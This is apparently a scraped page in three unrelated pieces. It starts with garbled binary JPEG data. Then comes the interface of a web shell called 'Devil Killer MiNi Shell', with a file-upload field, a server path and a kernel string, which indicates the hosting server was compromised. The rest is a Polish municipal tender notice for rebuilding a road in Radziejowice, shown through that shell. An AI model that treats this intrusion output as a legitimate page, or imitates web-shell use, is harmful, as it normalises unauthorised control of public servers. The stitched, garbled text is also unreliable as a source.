JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220916/0035146701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej lokalnej w ciągu ul. Sienkiewicza,<br/>Al. Lipowej w miejscowościach Radziejowice, Radziejowice - Parcel i Kuranów. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Radziejowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148414</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kubickiego 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radziejowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-325</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL926 - Żyrardowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@radziejowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://radziejowice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej lokalnej w ciągu ul. Sienkiewicza,<br/>Al. Lipowej w miejscowościach Radziejowice, Radziejowice - Parcel i Kuranów. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ab27e80f-359d-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00351467</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00036453/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Przebudowa drogi gminnej lokalnej w ciągu ul. Sienkiewicza, Al. Lipowej w miejscowości Radziejowice-Radziejowice Parcel</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">: https://miniportal.uzp.gov.pl/,https://epuap.gov.pl/wps/portal,<br/>zamowienia.publiczne@radziejowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie i niniejszej SWZ, odbywa się przy użyciu środków<br/>komunikacji elektronicznej.<br/>2. W niniejszym postępowaniu o udzielenie zamówienia, ofertę, oświadczenia, o których mowa w rozdziale X pkt 1 – 2 i pkt 4-5 SWZ,<br/>dokument gwarancji lub poręczenia wadialnego oraz dokumenty o których mowa w rozdziale X pkt 7-8 SWZ, zobowiązania podmiotu<br/>udostępniającego zasoby składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>3. Składanie ofert, oświadczeń, o których mowa w rozdziale X pkt 1 – 2 i pkt 4-5 SWZ, dokument gwarancji lub poręczenia<br/>wadialnego oraz dokumenty o których mowa w rozdziale X pkt 7-8 SWZ, zobowiązania podmiotu udostępniającego zasoby, odbywać<br/>się będzie za pomocą środków komunikacji elektronicznej przy użyciu miniPortalu: https://miniportal.uzp.gov.pl/ oraz ePUAPu<br/>https://epuap.gov.pl/wps/portal<br/>4. Za pomocą środków komunikacji elektronicznej przy użyciu miniPortalu https://miniportal.uzp.gov.pl/ oraz ePUAPu<br/>https://epuap.gov.pl/wps/portal zamawiający podejmował będzie działania określone w art. 128 ustawy Pzp i art. 274 ustawy Pzp.<br/>5. Pozostałe informacje, dokumenty i komunikacja między zamawiającym a wykonawcami, w szczególności składnie wniosków,<br/>zawiadomień oraz przekazywanie informacji (innych niż wskazanych powyżej) odbywać się będzie elektronicznie za pośrednictwem<br/>dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal lub przy użyciu<br/>poczty elektronicznej.<br/>6. Wszelkie zawiadomienia, oświadczenia, wnioski oraz informacje przekazane przy użyciu poczty elektronicznej wymagają na<br/>żądanie każdej ze stron, niezwłocznego potwierdzenia faktu ich otrzymania. Przesłanie dokumentu e-mailem bez względu na<br/>włączenie czy wyłączenie opcji potwierdzenia uznane będzie, jako dokonane, tj. wysłane i otrzymane w tej samej chwili, w przypadku<br/>gdy nadawca informacji nie otrzyma informacji zwrotnej o błędach.<br/>7. Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” dostępnego na ePUAP<br/>jako załączniki.<br/>8. Zamawiający dopuszcza w postępowaniu także komunikację ustną w odniesieniu do informacji, które nie są istotne, w<br/>szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia – przez telefon z osobą uprawnioną do kontaktu<br/>ze strony Zamawiającego.<br/>9. Do zaszyfrowania oferty nie jest potrzebna ani aplikacja do szyfrowania ofert, ani plik z kluczem publicznym.<br/>10. Cały proces szyfrowania ma miejsce na stronie miniPortal.uzp.gov.pl<br/>11. Aby zaszyfrować ofertę Wykonawca musi na stronie miniPortalu wybrać w górnym menu opcję „Postępowania”, następnie na<br/>liście wszystkich postępowań wybrać to, do którego chce złożyć ofertę i wejść w jego szczegóły.<br/>12. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>13. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>14. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>15. Szczegółowy sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie:<br/>https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.7.2022.DJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest przebudowa drogi gminnej lokalnej w ciągu ul. Sienkiewicza, al. Lipowej<br/>w miejscowościach Radziejowice, Radziejowice Parcel i Kuranów, gmina Radziejowice, powiat<br/>żyrardowski, od km 0+000 do km 1+950,67, ETAP I i III.<br/>2. Zamówienie współfinansowane jest z Programu: Rządowy Fundusz Polski Ład: Program Inwestycji<br/>Strategicznych.<br/>3. Zakres robót stanowiących przedmiot zamówienia obejmuje w szczególności:<br/>1) przebudowę drogi gminnej lokalnej w ciągu ul. Sienkiewicza, al. Lipowej w miejscowościach<br/>Radziejowice, Radziejowice Parcel i Kuranów, gmina Radziejowice, powiat żyrardowski, od km 0+000<br/>do km 1+950,67, ETAP I i III;<br/>2) przebudowę istniejącego wlotu ul. Sienkiewicza do skrzyżowania z drogą powiatową nr 4713W – ul.<br/>Główna;<br/>3) przebudowę skrzyżowań z drogami gminnymi i wewnętrznymi;<br/>4) przebudowę konstrukcji jezdni;<br/>5) budowę zatok postojowych oraz chodników;<br/>6) budowę i przebudowę zjazdów indywidualnych i publicznych;<br/>7) budowę przepustów oraz przebudowę odwodnienia pasa drogowego;<br/>8) budowę oświetlenia drogowego;<br/>9) wykonanie terenów zieleni;<br/>10) wykonanie nowego oznakowania pionowego i poziomego.<br/>4. Zamawiający informuje, że na odcinku drogi od km 0+417,66 do km 1+950,67, realizowana będzie<br/>inwestycja budowy sieci gazowej wraz z przyłączami. Lokalizacja w/w urządzeń stanowi załącznik nr 8<br/>do niniejszej SWZ.<br/>Planowany termin realizacji inwestycji budowy sieci gazowej wraz z przyłączami wynosi do 31.08.2023<br/>r. Wykonawca realizujący przedmiotowe zamówienie jest zobowiązany uwzględnić powyższe w<br/>harmonogramie rzeczowym realizacji niniejszego zamówienia.<br/>W przypadku niezachowania powyższego terminu zostanie sporządzona odpowiednia korekta do<br/>harmonogramu realizacji niniejszego zamówienia<br/>Obowiązki wykonawcy / inwestora budowy sieci gazowej:<br/>1) Urządzenia biegnące w poprzek pasa drogowego będą posadowione prostopadle do osi drogi,<br/>wykonane metodą przecisku i umieszczone w rurze osłonowej.<br/>2) Pas drogowy będzie przywrócony do stanu pierwotnego.<br/>3) W przypadku kolizji sieci gazowej z elementami pasa drogowego podczas budowy, wykonawca sieci<br/>na własny koszt dokona przełożenia lub zabezpieczenia urządzeń.<br/>4) W przypadku budowy lub przebudowy drogi i stwierdzeniu kolizji wybudowanej sieci gazowej z<br/>projektowanymi elementami pasa drogowego właściciel sieci zobowiązany będzie do przełożenia jej<br/>na własny koszt.<br/>5) Realizacja i koszt budowy sieci gazowej oraz odtworzenie nawierzchni w pasie drogowym związanych<br/>z wykonaniem sieci ponosi inwestor budowy tej sieci.<br/>6) W przypadku konieczności odtworzenia nawierzchni w pasie drogowym będzie obowiązek<br/>przedłożenia wyników zagęszczenia gruntu.<br/>5. Wykonawca w ramach niniejszego zamówienia zapewni pełną obsługę geodezyjną inwestycji, w tym<br/>wytyczenie i inwentaryzację powykonawczą.<br/>6. Wykonawca realizując zamówienie będzie wykonywał roboty w sposób jak najmniej uciążliwy i kolizyjny<br/>dla mieszkańców.<br/>7. Szczegółowy zakres robót, w tym wymagania dotyczące jakości materiałów oraz wykonania robót zawarte<br/>są w Dokumentacji Technicznej, stanowiącej załącznik nr 7 SWZ, na którą składają się w szczególności:<br/>1) Projekty budowlano-wykonawcze;<br/>2) Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (STWiORB);<br/>3) Przedmiary robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi i gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kierownika robót w branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu na podstawie art. 108 ust. 1 pkt 1-6 ustawy Pzp oraz nie podlegają<br/>wykluczeniu z art. 7 ust. 1 ustawy z dnia 15 kwietnia 2022 r o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>(Dz. U. poz. 835);<br/>1) spełniają warunki udziału w postępowaniu dotyczące:<br/>a. sytuacji ekonomicznej lub finansowej<br/>b. zdolności technicznej lub zawodowej<br/>2. Wykonawca spełni warunki, o których mowa w pkt 1 ppkt 2 lit. a. w zakresie sytuacji ekonomicznej lub<br/>finansowej w następujących okolicznościach: Wykonawca musi potwierdzić, że jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na<br/>sumę gwarancyjną w wysokości nie mniejszą niż 1 000 000,00 zł (słownie: jeden milion złotych).<br/>3. Wykonawca spełni warunki, o których mowa w pkt 1 ppkt 2 lit. b. w zakresie zdolności technicznej i<br/>zawodowej w następujących okolicznościach:<br/>1) Wykonawca musi posiadać doświadczenie w należytym wykonaniu w okresie ostatnich pięciu lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, co najmniej 2 robót polegających na budowie, przebudowie lub remoncie drogi w zakresie<br/>co najmniej robót dotyczących nawierzchni jezdni asfaltowej o wartości każdej roboty budowlanej w<br/>powyższym zakresie wynoszącej min. 2 000 000 tys. PLN brutto (słownie: dwa miliony złotych<br/>00/100).<br/>2) Wykonawca zobowiązany jest wskazać do realizacji niniejszego zamówienia osobę odpowiedzialną za<br/>kierowanie robotami budowlanymi w branży drogowej – która będzie jednocześnie pełniła funkcję<br/>kierownika budowy, posiadającą uprawnienia do kierowania robotami w specjalności inżynieryjnej<br/>drogowej lub ważne uprawnienia do sprawowania samodzielnych funkcji w budownictwie w zakresie prac, które będą przedmiotem zamówienia i za które będzie odpowiedzialny, które zostały wydane<br/>na podstawie wcześniej obowiązujących przepisów.<br/>Ponadto ww. osoba musi posiadać doświadczenie w pełnieniu min. 1 funkcji kierownika robót<br/>polegających na budowie, przebudowie lub remoncie drogi w zakresie co najmniej robót<br/>dotyczących nawierzchni asfaltowej o wartości każdej roboty budowlanej w powyższym zakresie<br/>wynoszącej min. 2 000 000 tys. PLN brutto (słownie: dwa miliony złotych 00/100), przy czym funkcja<br/>kierownika robót winna trwać do momentu odbioru końcowego tych robót.<br/>Osoba wymieniona powyżej musi być tą są osobą, o której mowa w formularzu ofertowym stanowiącym<br/>załącznik nr 1 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający będzie żądał następujących dokumentów potwierdzających okoliczności, o których mowa<br/>w rozdziale IX pkt 2 SWZ: dokument potwierdzający, że wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>na sumę gwarancyjną określoną przez zamawiającego.<br/>8. Zamawiający będzie żądał następujących dokumentów potwierdzających okoliczności, o których mowa<br/>w rozdziale IX pkt 3 SWZ:<br/>1) wykazu robót budowlanych (zgodnie z zał. nr 5 do SWZ) wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i<br/>podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy<br/>te roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty wystawione przez podmiot, na rzecz którego roboty były wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych<br/>dokumentów – inne dokumenty.<br/>2) wykazu osób (zgodnie z zał. nr 6 do SWZ), skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Każdy wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 5 000,00 zł<br/>(słownie: pięć tysięcy złotych 00/100)<br/>2) Wadium może być wnoszone w jednej lub kilku formach przewidzianych w art. 97 ust. 7 ustawy Pzp.<br/>3) Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek zamawiającego:<br/>Bank Spółdzielczy w Mszczonowie, Oddział Radziejowice<br/>Nr rachunku: 97 9302 1014 3900 0909 2000 0020<br/>4) Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym zamawiającego.<br/>5) Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt<br/>2-4 ustawy Pzp, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci<br/>elektronicznej.<br/>6) Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu<br/>terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz<br/>ust. 2 ustawy Pzp.<br/>7) Niewniesienie wadium lub wniesienie go w sposób nieprawidłowy lub nieutrzymywanie wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożenie wniosku o zwrot wadium w<br/>przypadku, o którym mowa w art.98 ust. 2 pkt 3 – stanowią bezwzględną przesłankę odrzucenia<br/>oferty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zamawiający wymaga aby przy wykazywaniu przez wykonawcę spełniania warunków udziału w postępowaniu w<br/>przypadku wspólnego ubiegania się o udzielenie zamówienia albo na zasadach określonych w artykule 118 ustawy Pzp,<br/>warunki określone w rozdz. IX pkt 3 ppkt 1 były spełnione samodzielnie przez 